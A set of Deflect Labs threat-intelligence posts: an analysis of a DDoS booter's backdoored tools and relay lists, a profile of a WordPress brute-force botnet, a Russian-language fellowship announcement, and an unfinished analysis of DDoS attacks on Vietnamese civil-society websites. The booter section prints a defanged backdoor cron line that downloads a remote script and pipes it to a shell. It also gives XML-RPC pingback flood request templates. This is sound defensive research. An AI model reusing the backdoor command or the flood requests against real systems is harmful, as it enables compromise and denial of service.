We could not download these php files (sockhit.php and api.php), but we could quickly deduce that they were used to remotely command the booter server from the interface to launch attacks.
l@tp $ curl http://178.128.244.42/sockhit.php Made By Routers.Rip Usage: php [URL] [THREADS] [SECONDS] [CLIENTS_NUMBER] [SOCKS_FILE] Example: php http://Routers.Rip/ 800 60 20 proxies.txt l@tp $ curl http://178.128.244.42/api.php Missing Parameters!%
One interesting thing to notice, is that the sockhit.php file does not seem to require authentication, which means that the infrastructure could have been used by other people unknowingly of the owners. We think that these PHP files are not directly launching the attacks but rather using the different tools deployed on the server to do that.
Backdoored Tools
The following tools were found on the server :
- https.js a206a42857be4f30ea66ea17ce0dadbc
- joomla 1956fc87a7217d34f5bcf25ac73e2d72a1cae84a
- jsb.js b3a55eeb8f70351c14ba3b665d886c34
- xmlrpc 480e528c9991e08800109fa6627c2227
We reversed both the xmlrpc and joomla file, and discovered that the joomla binary is actually backdoored. The file contains the real joomla executable from byte 0x2F29, upon execution the legitimate program is dumped into a temporary file (created with tmpnam
), then a crontab is added by opening /etc/cron.hourly/0
and adding the line wget hxxp://r1p[.]pw/0 -O- 2>/dev/null| sh>dev/null 2>&1
. The backdoor then opens itself and checks if it already contains the string h3dNRL4dviIXqlSpCCaz0H5iyxM=
contained in the backdoor. If it does not contain the string, it will backdoor the file. Finally, it executes the legitimate program with the same arguments.
The final payload (5068eacfd7ac9aba6c234dce734d8901) takes as arguments (target) (list) (time) (threads)
, then read the list file to get the list of Joomla websites and query it with raw socket and the following HTTP query :
HEAD /%s%s HTTP/1.1 Host: %s User-agent: Mozilla/5.0 Connection: close
The xmlrpc binary (480e528c9991e08800109fa6627c2227) is working in the same way (and is not backdoored) : Upon execution, the user has to provide a target website along with a list of WordPress websites in a file, a number of seconds for the attack and a number of threads ({target} {file} {seconds} {threads}
). The tool then iterate over the list of WordPress website in multiple threads for the given duration, doing the following requests to the website :
POST /%s HTTP/1.0 Host: %s Content-type: text/xml Content-length: %i User-agent: Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0) Connection: close <methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>
https.js and jsb.js are both Javascript tools forked from the cloudscaper tool which allows to bypass Cloudfare anti-DDoS Javascript challenge by solving the challenge server side and bypassing the protection. We don’t really know how it is used by the booter.
These jsb.js file contains the following line, which was likely done to prevent attack from this tool on the Turkish Hacker forum DarbeTurk but was partially deleted then :
if (body.indexOf('DARBETURK ONLINE | TURKISH UNDERGROUND WORLD') !== -1) { //console.log('RIP'); }
A Long List of Relays
The following list of relays where used on the server :
- joomla.txt : contains 1226 Joomla websites having a Google Maps plugin vulnerable to relaying
- path.txt : list of 2117 open proxies
- perfect.txt : list of 1000 open proxies
- socks.txt : list of 37849 open proxies
- xmlrpc.txt : list of 9072 WordPress websites
As said earlier, it is surprising to see 1226 Joomla website with a vulnerable Google Maps plugin, while this vulnerability was identified and fixed in 2014. We queried the 1226 urls to check if the php page was still available and found that only 131 of them over 1226 still exist today. It explains the small number of requests identified from this type of relay in the attack, and shows that the tools and list used are quite outdated.
Summary
This booter relies on three different DDoS methods, all using different relays :
- WordPress pingback attacks
- Joomla Google Maps plugin vulnerability
- Open proxies
The attacks we have seen from this booter where not very effective and were automatically mitigated by Deflect. The back-doored joomla file and the jsb.js Javascript tool (with a reference to a Turkish hacker forum) let us think that we have here a very amateur group that reused different tools shared on hacker forums, and imply a low technical skill level.
Tracking the booter’s infrastructure
A few days after we downloaded the tools, we saw the index page of all the servers change to a very simple html file containing only ‘kekkkk’ and although the tools were still available we were not able to see the list of files on the servers. As this string is a specific signature, we used Censys and BinaryEdge to track the creation of new servers by looking for IPs returning the same specific string.
Between mid-November and mid December, we have seen the booter using both Vultr and Google Cloud Platform. Overall we have identified 65 different IPs used by the operators, with a maximum of 17 at a single time.
We sent abuse requests to these companies, the two Google Cloud servers were shortly taken down after our email (we have no information if it is related to our abuse request or not). We contacted Vultr abuse team several times and they took down the booter infrastructure in mid-December. We sent an abuse request to Digital Ocean when we discovered the attack. Several days after we managed to get in touch with the incident response team that investigated more on this infrastructure. After discussions with them, they took down the infrastructure in December, but the operator quickly started new Digital Ocean servers that are still up at the time of the publication of this report.
Impact on Deflect protected websites
This DDoS attack was automatically mitigated by Deflect and did not create any negative impact on the targeted website.
Conclusion
People operating this booter have been identified by the Digital Ocean security team. However, without an official complaint and a legal enforcement request, the booter continues to operate creating new infrastructure for launching their attacks.
Booters have been around for a long time and even if several groups have been taken down by police (like the infamous Webstresser.org), this attack shows that the threat is still real. The analysis of the tools presented here seems to show that low skills are sufficient to run a booter service simply by reusing tools published on different hacker forums. Even so, an attack from this amplitude would be enough to take down a small to medium sized website without adapted DDoS protection.
We hear regularly about DDoS attacks coming from booters hosted on ecommerce websites, or game platforms, but this incident is also another reminder that civil society organization are a frequent victim of these same booters.
Indicators of Compromise
Original servers used by the booter (all Digital Ocean IPs):
- 178.128.244.42
- 178.128.244.184
- 178.128.242.66
- 178.128.249.196
- 142.93.136.67
- 188.166.26.137
- 188.166.43.4
- 188.166.105.145
- 174.138.13.37
- 188.166.125.216
md5 of the files available on the booter’s servers :
- a206a42857be4f30ea66ea17ce0dadbc https.js
- cf554c82438ca713d880cad418e82d4f joomla
- a21e6eaea1802b11e49fd6db7003dad0 joomla.txt
- b3a55eeb8f70351c14ba3b665d886c34 jsb.js
- 9263a09767e1bad0152d8354c8252de9 path.txt
- 5214cbb3fc199cb3c0c439aedada0f2a perfect.txt
- db8ee68a81836cde29c6d65a1d93a98d socks.txt
- 480e528c9991e08800109fa6627c2227 xmlrpc
- ea2c3ee7ac340c25a9b9aa06c83d0b6e xmlrpc.txt
Acknowledgment
We would like to thank the different incident response teams that have had to deal with our constant emails, Censys, ipinfo.io and BinaryEdge for their tools.
News From Deflect Labs: Botnet Targeting WordPress Websites
Key Findings
- We identified traffic from thousands of IPs trying to brute-force WordPress websites protected by Deflect using the same user-agent (
Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
) since September 2017 - We confirmed that it was not only targeting Deflect protected websites, but targeting also a large number of websites over Internet
- We analyze in this blog post the origin IPs of this botnet, mostly coming from IP addresses located in China.
Introduction
In August 2018, we identified several attempts of brute-forcing WordPress websites protected by Deflect. These attacks were all using the same user-agent, Firefox version 52 on Windows 7 (Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
). By retracing similar attacks with this user-agent, we discovered a large number of IP addresses involved in these attacks on over more than hundred of Deflect protected websites since September 2017.
Presentation of an Attack
An example of an attack from this botnet can be found in the traffic we observed on a Deflect protected website on the 24th of May with the user agent `Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0` :
At first one IP, 125.65.109.XXX (AS38283 – CHINANET) enumerated the list of authors of the WordPress website :
Then 168 different IP addresses were used to brute-force the password by doing POST queries to /wp-login.php :
Targeting beyond Deflect Users
The botnet’s large target list quickly made us think that it was not part of a political operation or a targeted attack, but rather an attempt to compromise any website available on the Internet. To confirm our hypothesis, we decided to share indicators of these attacks within threat intelligence groups as well as the GreyNoise platform to see if honeypots were targeted.
Shared Threat Intelligence
We shared indicators of attacks to other members of an Information Sharing and Analysis Center (ISAC) we are part of. Two members confirmed having seen the same attacks on their professional and personal websites. One of the members accepted to share logs and IP addresses with us, which confirmed the same type of attack with the same user-agent.
Using GreyNoise data
We used both the open and enterprise access of the GreyNoise platform to gather more data about this botnet. GreyNoise is a threat intelligence platform that focus on identifying the attack noise online through a large network of honeypots in order to differentiate targeted attacks from non-targeted attacks. (We got access to the Enterprise platform after an eQualit.ie member contributed to the development of tools for GreyNoise platform). GreyNoise works by gathering information on IPs that are scanning any GreyNoise’s honeypot, and tagging them based on the type of scan identified. We can see quickly in the GreyNoise visualizer that many IPs are identified as WORDPRESS_WORM :
We enumerated the list of IP addresses listed as WORDPRESS_WORM, and then queried detailed information for each IP in order to identify the one using the Firefox 52 user-agent characteristic of this botnet. We identified 725 different IP addresses from this data set among the last 5000 WordPress scanners available through the Enterprise API.
These two pieces of information confirm that this botnet is targeting websites far beyond the websites we protect with Deflect.
Analysis of the traffic to Deflect
We identified the first query from this botnet on Deflect websites on the 27th of September 2017. We have graphed the number of requests done by this botnet to /wp-login.php over time :
Looking more closely at the distribution of number of requests per IP addresses, we see that a small number of IP addresses are doing a large number of requests :
Analysis of the botnet
We identified 3148 unique IPs belonging to this botnet from the following sources :
- 3011 targeting Deflect protected websites since September 2017
- 725 identified by GreyNoise as WordPress
- 7 from logs shared by people from different communities
Checking the origin Autonomous Systems, we can see that 39% of the IPs come from the AS 4134 (Chinanet backbone) and 4837 (China169) :
- 872 ASN4134 CHINANET-BACKBONE No.31,Jin-rong Street, CN
- 342 ASN4837 CHINA169-BACKBONE CHINA UNICOM China169 Backbone, CN
- 93 ASN9808 CMNET-GD Guangdong Mobile Communication Co.Ltd., CN
- 87 ASN18881 TELEFÔNICA BRASIL S.A, BR
- 86 ASN8452 TE-AS TE-AS, EG
- 82 ASN9498 BBIL-AP BHARTI Airtel Ltd., IN
- 50 ASN17974 TELKOMNET-AS2-AP PT Telekomunikasi Indonesia, ID
- 48 ASN3462 HINET Data Communication Business Group, TW
- 47 ASN4766 KIXS-AS-KR Korea Telecom, KR
- 40 ASN24445 CMNET-V4HENAN-AS-AP Henan Mobile Communications Co.,Ltd, CN
If we look at the origin countries of these IP’s, we see that 53% of them are based in China :
- 1654 China
- 171 Brazil
- 168 India
- 102 Russia
- 94 Indonesia
- 87 Egypt
- 82 Republic of Korea
- 65 United States
- 62 Taiwan
- 43 Vietnam
We queried ipinfo.io to get the type of Autonomous Systems these IP’s are part of :
- 2743 : Internet Service Providers
- 271 : Business
- 132 : Hosting
- 2 : Unknown
To identify the operating system of these bots, we used another interesting feature of GreyNoise, which is the identification of the operating system at the origin of these requests through passive fingerprinting techniques (using p0f signatures). By querying all the IPs from this botnet in GreyNoise and filtering on the one using the Firefox 52 user agent, we checked which operating systems these IPs used (1370 IP’s from our list were identified in GreyNoise with Firefox 52 user agent) :
- 662 unknown
- 238 Linux 2.6
- 209 Linux 2.4.x
- 88 Linux 3.1-3.10
- 63 Linux 2.4-2.6
- 51 Linux 2.2-3.x
- 17 Linux 3.11+
- 12 Linux 2.2.x-3.x (Embedded)
- 9 Linux 3.x
- 8 Mac OS X 10.x
- 6 Windows 7/8
- 4 FreeBSD
- 1 Linux 2.0
- 1 Windows 2000
- 1 Windows XP
Another interesting fact shown by GreyNoise data is that over these IPs, 2105 were also identified for other of types scans, mostly for the following suspicious activities :
- WEB_SCANNER_LOW: 1404,
- SSH_SCANNER_LOW: 1037
- SSH_WORM_LOW: 950
- WEB_CRAWLER: 705
- TELNET_SCANNER_LOW: 117
- TELNET_WORM_HIGH: 80
- SSH_WORM_HIGH: 77
- HTTP_ALT_SCANNER_LOW: 52
- SMB_SCANNER_LOW: 44
- SSH_SCANNER_HIGH: 33
We have used this data to map the activity identified by GreyNoise over time, first only for the WordPress brute-force traffic, then second for any suspicious activity :
We can see that this botnet is not used only to attack WordPress or that most of these devices are compromised by more than one malware.
Impact on Deflect
We have not identified any impact from this botnet on Deflect protected websites. The first reason is that any heavy traffic going beyond the threshold defined in our Banjax rules would automatically ban the IP for some time. A large part of the traffic from this botnet was actually blocked automatically by Deflect.
The second reason is that most websites using Deflect use the Banjax admin page protection, which requires an extra shared password to access administrator parts of a website (for WordPress, /wp-admin/)
Protection Against Bruteforce
The WordPress documentation describes several ways to protect your website against such brute-force attacks. The first one is to use a strong password, preferable a passphrase that would resist dictionary attacks used most of the time.
Many WordPress plugins also exist to ban an IP address after several failed attempts, like Brute Force Login Protection, Ninja Firewall or SiteGuard (see the full list of extensions here).
It is also possible to add an extra password (a bit like Banjax does) to the administration part of your website by using HTTP authentication. See the WordPress documentation for more information. (If you choose this option, it is recommended to install a tool preventing HTTP brute-force like fail2ban).
For professional WordPress hosting, a strong counter-measure to these attacks is to separate WordPress’ live PHP code from rendered WordPress code by hosting the administration part of the website on a different domain (for instance using django-wordpress). We plan to implement this strategy on our own WordPress hosting in the coming months.
Conclusion
In this blog post, we have described a botnet targeting WordPress website all around the world. The number of devices part of the attack is quite large (more than 3000), which shows that it is a well organized activity. We have no information on the malware used to compromise these devices or on the objective of this group. We are definitely interested to be in touch with anyone having more information about this group, or interest in continuing this investigation. Please contact us at outreach AT equalit.ie
.
Appendix
Acknowledgement
We would like to thank member of the NGO ISAC, ipinfo.io and the Greynoise.io team for their support.
Indicators Of Compromise
You can look for the following indicators in your traffic :
- User-Agent :
Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
- url:
POST /wp-login.php
andGET /?author=1
(testing authors between 1 and 60)
We have no information on the post-compromise actions.
As with our last report, we have to not share public IP addresses used by this botnet, as they are likely compromised systems and we cannot control the potential side-effect of sharing these IP to owners of these systems. We are open to share them privately. We are aware of the challenges for sharing DDoS threat intelligence and we are also interested in starting a discussion about this topic. Please contact us at outreach AT equalit.ie
.
fellowship
!!Civic Hackers Wanted!!
for a web security fellowship
eQualit.ie анонсирует первую стипендиальную программу по интернет-безопасности для IT-специалистов, которые поработают с НКО, независимыми медиа и гражданскими организациями России над самыми интересными задачами сектора. Программа будет длиться 6 месяцев. Будут образовательные курсы, консультации со специалистами по безопасности и интернет-коммуникациям, индивидуальный план развития каждого стипендиата, и ежемесячная денежная стипендия для участников программы.
Сейчас мы проводим опрос среди потенциальных участников, будем рады если вы примете участие. Если вы IT-специалист, заинтересованный в партнерстве с НКО, активистами и независимыми организациями, пожалуйста, ответьте на несколько наших вопросов. Опрос займет всего 5 минут вашего времени.
FAQ
Что такое Fellowship?
Fellowship — это стипендиальная программа. Победители конкурса, IT-специалисты, смогут поработать с самыми интересными задачами из гражданского сектора России и пост-советских стран, пройдут образовательную программу и получат информационную финансовую поддержку от команды eQualit.ie.
Зачем вы это делаете?
Мы хотим помочь сформировать сообщество Civic Hackers (“гражданских хакеров”, или “хактивистов”) в России. Для этого мы готовы привлекать специалистов, курировать программу и находить для стипендиатов интересные задачи из гражданского и некоммерческого сектора.
От каких IT-специалистов вы ждете заявки?
Мы ждем людей, которые разделяют наши ценности: свобода слова, свободный от слежки интернет, и недопустимость дискриминации по любому признаку. Если вы давно хотите работать в некоммерческом секторе и на благо гражданского общества, но не могли устроиться / у организации не было возможности вас нанять (в том числе финансовой), Fellowhip — именно для вас. Будет здорово, если вы специализируетесь или хотите развиваться в:
- Secure web hosting and server administration
- Web application security attack and defenses (OWASP Top 10)
- Defensive programming and system administration
- Digital security training and auditing
Сколько это займет моего времени?
Программа займет примерно 20% вашего рабочего (учебного) дня. Мы очень попросим вас всегда присутствовать на онлайн-встречах, вебинарах, проходить тесты и писать небольшие отчеты о проделанной работе. И обязательно заложите время (и силы) на финальный митап: в конце программы мы проведем Civic Hackathon в оффлайне: встретимся и вместе поработаем над самыми интересными кейсами.
А это безопасно?
Когда начинаем?
Сначала проведем опрос и соберем контакты! На окончательное формирование программы возьмем еще несколько недель. В общем, примерно — в начале ноября. Подпишитесь на наши новости, и мы сразу же вам сообщим.
Хочу задать свой вопрос
Прекрасно! Напишите нам на почту fellowship ♠ equalit.ie, и мы вам ответим. Или подпишись на новости Fellowship, чтобы первым узнать о старте приема заявок:
[contact-form-7 id=”16595″ title=”Fellowship signup”]
News From Deflect Labs: DDoS attacks against Vietnamese Civil Society
Key Findings
- We identified 10 different DDoS attacks targeting two Vietnamese websites protected by Deflect, viettan.org and baotiengdan.com, between the 17th of April and 15th of June 2018. These attacks happened in the context of an important lack of Internet Freedom in Vietnam with regular online attacks against activists and independent media.
- We sorted these attacks in four different groups sharing the same Tactics, Techniques, and Procedures (TTPs). Group A is comprised of 6 different attacks, against both viettan.org and baotiengdan.com, which tend to show that these two websites have common enemies even if they have different political perspectives.
- We found common IPs between this group and a DDoS attack analyzed by Qurium in June 2018 against Vietnamese independent media websites luatkhoa.org and thevietnamese.org. Having four different Vietnamese civil society websites targeted by DDoS in the same period supports the hypothesis that these attacks are part of a coordinated action to silence NGOs and independent media in Vietnam.
- For each of the attacks covered in this report, we have investigated their origin and the systems used as relays.
Introduction
This blog post is the first in a series called “News from Deflect” intended to describe attacks on Deflect protected websites, with the objective of continuing discussions about distributed denial of service (DDoS) attacks against civil society.
Deflect is a free DDoS mitigation service for civil society organizations (see our Terms of Service to understand who fits into this description). Our platform is filtering traffic between users and civil society websites to remove malicious requests, in this case, bots trying to overload systems in order to make the website unavailable and silence political groups or independent media.
We have been protecting two Vietnamese websites, viettan.org and baotiengdan.com on the Deflect platform. Việt Tân is an organization seeking to establish democracy through political reforms in Vietnam. Tiếng Dân is an independent online non-partisan media covering political news in Vietnam.
Over the past several months, we have seen a significant increase of DDoS attacks against these two websites. Although Việt Tân and Tiếng Dân websites and organizations are not related to each other by any means and have different political perspectives, our investigations uncovered several attacks targeting them simultaneously. It appeared to us that these attacks are driven by a coordinated campaign and sought the websites’ agreement to publish an overview of the discovered activities.
Figure 1: heatmap of DDoS incidents against Việt Tân and Tiếng Dân websites over the past months
Internet and Media Freedom in Vietnam
For a more than a decade, there has been proof of online attacks against Vietnamese civil society. The earliest attacks we know focused on silencing websites either with DDoS attacks, like the attacks against the Bauxite Vietnam website in December 2009 and January 2010 or against Việt Tân in August 2011, or by compromising their platforms, as witnessed with Anh Ba Sam in 2013.
In 2013, the discovery by Citizen Lab of FinFisher servers installed in Vietnam indicated malware operations against activists and journalists. In March 2013, the managing editor of baotiengdan.com, Thu Ngoc Dinh, at that time managing editor of Anh Ba Sam, had her computer compromised and her personal pictures published online. Later that year, the Electronic Frontier Foundation documented a targeted malware operation against Vietnamese activists and journalists. This attack is now attributed to a group called OceanLotus (or APT32) that is considered to be Vietnam-based. Recently, an attack targeting more than 80 websites of civil society organizations (Human rights, independent media, individual bloggers, religious groups) was uncovered by Volexity in November 2017 and attributed to this same Ocean Lotus group.
At the same time, there is a strong suppression of independent media in Vietnam. Several articles in the Vietnamese constitution criminalize online publications opposing the Socialist Republic of Vietnam. They have been used regularly to threaten and condemn activists, like the blogger Nguyen Ngoc Nhu Quynh, alias ‘Mother Mushroom’ who was sentenced to 10 years in jail for distorting government policies and defaming the communist regime in Facebook posts in June 2017. Recently, Vietnamese legislators approved a cyber-security law requiring large IT companies like Facebook or Google to store locally personal data on users in Vietnam. This law has seen strong opposition by street protests and by human rights groups like Human Rights Watch and Amnesty International.
Vietnam is ranked 175th over 180 countries by Reporters without Border’s 2018 World Press Freedom Index and has a Freedom of the Net score of 75/100 in the Freedom of the Net report in 2017 by Freedom House.
10 different DDoS attacks
Since the 17th of April 2018, we have identified 10 different DDoS attacks targeting either Việt Tân or Tiếng Dân’s websites :
Date | Target | |
---|---|---|
1 | 2018/04/17 | viettan.org |
2 | 2018/04/17 | baotiengdan.com |
3 | 2018/05/04 | viettan.org |
4 | 2018/05/09 | viettan.org |
5 | 2018/05/09 | baotiengdan.com |
6 | 2018/05/23 | baotiengdan.com |
7 | 2018/06/07 | baotiengdan.com |
8 | 2018/06/10 | baotiengdan.com |
9 | 2018/06/12 | viettan.org |
10 | 2018/06/15 | baotiengdan.com |
These attacks were all HTTP flood attacks but came from different sources and with different characteristics (user agents, path requested etc.).
Identifying Groups of Attacks
From the beginning of the analysis, we saw some similarities between the different attacks, mainly through the user agents used by different bots, or the path requested. We quickly wanted to identify groups of attacks sharing the same Tactics, Techniques and Procedures (TTP).
We first described their characteristics in the following table :
id | Target | Start time | End Time | #IP | #Hits | Path | User Agent | Query String |
---|---|---|---|---|---|---|---|---|
1 | viettan.org | 2018-04-17 08:20:00 | 2018-04-17 09:10:00 | 294 | 63 830 | / | On random UA per IP | None |
2 | baotiengdan.com | 2018-04-17 8:30:00 | 2018-04-17 10:00:00 | 568 | 33 589 | / | One random UA per IP | None |
3 | viettan.org | 2018-04-28 00:00:00 | 2018-05-04 15:00:00 | 5001 | 2 257 509 | / or /spip.php | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) | if spip, /spip.php?page=email&id_article=10283 |
4 | viettan.org | 2018-05-09 02:30:00 | 2018-05-09 03:20:00 | 217 | 58 271 | / | One UA per IP | None |
5 | baotiengdan.com | 2018-05-09 08:30:00 | 2018-05-09 11:30:00 | 725 | 235 157 | / | One or several UA per IP | None |
6 | baotiengdan.com | 2018-05-23 15:00:00 | 2018-05-24 09:30:00 | 557 | 2 957 065 | / | One random UA per IP | None |
7 | baotiengdan.com | 2018-06-07 01:45:00 | 2018-06-07 05:30:00 | 70 | 17 131 | / | One random UA per IP | None |
8 | baotiengdan.com | 2018-06-10 05:45:00 | 2018-06-11 06:30:00 | 349 | 5 214 730 | / | python-requests/2.9.1 | ?&s=nguyenphutrong and random like |
9 | viettan.org | 2018-06-12 05:00:00 | 2018-06-12 06:30:00 | 1 | 9 978 | / | 329 different user agents | Random like ?x=%99%94%7E%85%7B%7E%8D%96 |
10 | baotiengdan.com | 2018-06-15 13:00:00 | 2018-06-15 23:00:00 | 1 | 518 899 | / | python-requests/2.9.1 | ?s=nguyenphutrong |
From this table, we can see that Incidents 8 and 10 clearly use the same tool identified by the user agent (python-requests/2.9.1
) and do the same specific query /?&s=nguyenphutrong
based on the name of Nguyễn Phú Trọng, the current General Secretary of the Communist Party of Vietnam. We gathered these two attacks in Group C.
Incidents 3 and 9 have different characteristics from other incidents, they seem to use two different custom-made tools for DDoS. We separated them into two different groups, B and D (see details in part 2).
We still have 6 different attacks that share common characteristics but not enough to confirm any linkages between them. They all query /
without any query string, which is quite common in DDoS attacks. They use random User-Agents for each IP address, which is close to what legitimate traffic looks like.
Identifying shared IPs
We wanted to check if these different attacks were sharing IP addresses so we represented both IPs and Incidents in a Gephi graph to visualize the links between them (IPs are represented with red dots and incidents with green dots in the following figure) :
We have identified six incidents sharing common IPs in their botnets, and present them in the following table of Incident intersection IPs:
incidents | Number of IPs | Intersection IP | % of total botnet IPs |
---|---|---|---|
6 & 1 | 557 & 294 | 5 | 1.70 % |
6 & 4 | 557 & 217 | 6 | 2.76 % |
6 & 7 | 557 & 70 | 3 | 4.29 % |
6 & 5 | 557 & 725 | 8 | 1.44 % |
6 & 2 | 557 & 568 | 1 | 0.18 % |
1 & 4 | 294 & 217 | 1 | 0.46 % |
1 & 7 | 294 & 70 | 2 | 2.86 % |
1 & 5 | 294 & 725 | 9 | 3.06 % |
1 & 2 | 294 & 568 | 155 | 52.72 % |
4 & 7 | 217 & 70 | 2 | 2.86 % |
4 & 5 | 217 & 725 | 14 | 6.45 % |
4 & 2 | 217 & 568 | 1 | 0.46 % |
7 & 5 | 70 & 725 | 1 | 1.43 % |
7 & 2 | 70 & 568 | 1 | 1.43 % |
5 & 2 | 725 & 568 | 22 | 3.87 % |
There is a strong overlap of bots used in Incidents 1 and 2 (53%), which is telling considering that Incident 1 is targeting viettan.org and incident 2 is targeting baotiengdan.com. Its is a strong indication that a similar botnet was used to attack these two domains, particularly as the attacks were orchestrated at the same on April 17th.
Other attacks all share between 1 and 22 IP addresses in common (<10%) which is a quite small percentage of intersection and may have different explanations. For instance, the same system is compromised by several different malware turning them into bots, or that different compromised systems are behind the same public IP.
Identifying origin countries
Another link to consider is if these IPs used for different attacks are from the same countries. If we consider a botnet that would use specific ways to infect end systems, it is likely that they would be unevenly distributed over the world. For instance a phishing attack in one language would be more efficient in a country speaking this language, or an Internet wide scan for vulnerable routers would compromise more devices in countries using the targeted router.
We have geolocated these IPs using MaxMind GeoLite database and represented the origin in the following graph (countries having less than 5% IPs are categorized as “Other” for visibility) :
Besides Incident 7, these attacks clearly share the same profile : between 15 and 30% of IPs are from India, between 5 and 10% from Indonesia, then Philippines or Malaysia. Surprisingly, the 7th incident has only one IP coming from India (categorised as Other in this graph) but has a similar distribution in other countries. So the distribution seems quite similar.
Analyzing User-Agents
Another interesting characteristic of these attacks is that every IP is using a single user agent for all of its requests, presumably selected from a list of predefined user-agents. We listed User-Agents used in different incidents and checked the similarity between these lists :
incidents | Number of UA | Number of identical UA | Percentage |
---|---|---|---|
6 & 2 | 68 & 40 | 29 | 72.50 % |
6 & 1 | 68 & 54 | 32 | 59.26 % |
6 & 5 | 68 & 97 | 40 | 58.82 % |
6 & 4 | 68 & 57 | 32 | 56.14 % |
6 & 7 | 68 & 38 | 34 | 89.47 % |
2 & 1 | 40 & 54 | 23 | 57.50 % |
2 & 5 | 40 & 97 | 27 | 67.50 % |
2 & 4 | 40 & 57 | 17 | 42.50 % |
2 & 7 | 40 & 38 | 27 | 71.05 % |
1 & 5 | 54 & 97 | 32 | 59.26 % |
1 & 4 | 54 & 57 | 29 | 53.70 % |
1 & 7 | 54 & 38 | 28 | 73.68 % |
5 & 4 | 97 & 57 | 34 | 59.65 % |
5 & 7 | 97 & 38 | 31 | 81.58 % |
4 & 7 | 57 & 38 | 24 | 63.16 % |
Between 42 and 81% of user-agents are shared between every set of two incidents. Low intersections between two incidents could be due either to different versions of the same tool used in different attacks, or to interference with legitimate traffic.
15 different user agents were used in all of the 6 incidents:
User-Agent | Description |
---|---|
Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1 | Firefox 5 on Windows XP |
Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8 | Firefox 3.6 on Ubuntu Linux 10 |
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 | Chrome 53 on Windows 10 |
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 | Chrome 53 on Windows 7 |
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 | Chrome 45 on Windows 7 |
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 | Firefox 41 on Windows 8.1 |
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 | Chrome 63 on Windows 10 |
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 | Firefox 41 on Windows 7 |
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 | Chrome 13 on Windows Vista |
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 | Chrome 53 on Mac OS X (El Capitan) |
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 | Firefox 13 on Windows 7 |
Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02 | Firefox 5 on Windows 7 |
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 | Chrome 63 on Windows 7 |
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 | Chrome 53 on Windows 10 |
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Internet Explorer 11 on Windows 7 |
Analyzing Traffic Features
For a long-time, we have been using visualization and machine learning tools to analyze DDoS attacks (for instance in the report on attacks against Black Lives Matter). We find it is more reliable to consider information about the whole session of an IP (all the requests done by an IP over a period of time) rather than per request. So we generate features describing each IP session and then visualize and cluster these IPs to identify bots. This approach is really interesting to confirm the link between these different attacks, here were are relying on the four following features to compare the sessions from the different groups:
- Number of different user-agents used
- Number of different query strings done
- Number of different paths queried
- Size of the requests
First, we can clearly see that the Incident 8 has an identifiable signature due to the utilization of a specifically crafted tool generating random user agent and random query strings (1058 query strings and 329 user-agents) :
Considering other attacks now, the identification is not that clear, mainly because some IPs seems to do both legitimate visits of the website and attacks at the same time. But for most of the IPs, we clearly see that the number of query string and the payload size is discriminant :
Summary of the Different Attack Groups
Overall, we identified four different groups of attacks sharing the Same TTPs :
Date | Target | Attack Group | |
---|---|---|---|
1 | 2018/04/17 | viettan.org | Group A |
2 | 2018/04/17 | baotiengdan.com | Group A |
3 | 2018/05/04 | viettan.org | Group B |
4 | 2018/05/09 | viettan.org | Group A |
5 | 2018/05/09 | baotiengdan.com | Group A |
6 | 2018/05/23 | baotiengdan.com | Group A |
7 | 2018/06/07 | baotiengdan.com | Group A |
8 | 2018/06/10 | baotiengdan.com | Group C |
9 | 2018/06/12 | viettan.org | Group D |
10 | 2018/06/15 | baotiengdan.com | Group C |
Let’s enter into the detail of TTP for each group :
- Group A : TTPs for this group seem to be quite generic and we have only a moderate confidence that the attacks are linked. All these attacks are querying
/
(which is pretty common) with on user agent per IP (regularly an empty user agent). The IPs from these groups are coming from Asia, mostly India, Indonesia, Philippines or Malaysia. Attacks in this group are often reusing the same user-agents which could indicate several versions of the same payload. - Group B : this attack used the user-agent
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
to query eitherGET /
orPOST /spip.php?page=email&id_article=10283
- Group C : two attacks with the user-agent
python-requests/2.9.1
(showing the utilization of a python script with the requests library) querying either/?&s=nguyenphutrong
or a random search term like/?s=06I44M
- Group D : One attack with a tool using a random value among a list of 329 user-agents, and random query strings (like
?x=%99%94%7E%85%7B%7E%8D%96
) to bypass caching
Analyzing Attack Groups
Group A
